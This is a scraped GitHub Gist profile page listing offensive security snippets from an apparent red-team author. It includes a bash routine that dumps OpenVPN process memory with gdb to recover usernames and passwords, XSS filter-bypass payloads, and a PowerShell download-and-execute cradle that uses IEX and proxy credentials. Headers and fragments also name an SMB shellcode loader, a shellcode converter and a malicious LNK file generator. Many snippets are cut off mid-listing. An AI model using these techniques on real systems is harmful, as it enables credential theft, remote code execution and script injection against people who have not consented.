Skip to content

Instantly share code, notes, and snippets.


Steve Borosh rvrsh3ll

View GitHub Profile
View Invoke-WMISMB.ps1
function Invoke-SMBWmi {
$ComputerName = ".",
$Pipename = "tf12lol"
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
rvrsh3ll / xxsfilterbypass.lst
Last active Jan 7, 2022
XSS Filter Bypass List
View xxsfilterbypass.lst
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
View proxybypass.txt
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))"
View Get-RecentDocs.ps1
function Get-RecentDocs {
Pulls names of recently opened documents from registry
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
View Get-BrowserInformation.ps1
function Get-BrowserInformation {
Dumps Browser Information
Author: @424f424f
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Enumerates browser history or bookmarks
import binascii
import sys
file_name = sys.argv[1]
with open (file_name) as f:
hexdata = binascii.hexlify(
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
shellcode += "0x{},".format(i)
View Invoke-WMItoSMB.ps1
function Invoke-SMBShellcodeLoad {
Short description
Long description
An example
rvrsh3ll /
Created Sep 3, 2017 — forked from ropnop/
Python script using Impacket to enumerate local administrators over SAMR
#!/usr/bin/env python
# Title:
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See:
# Heavily based on original Impacket example scripts written by @agsolino and available here:
View Create-LNK.ps1
function Create-LNKPayload{
Generates a malicous LNK file
Name of the LNK file you want to create.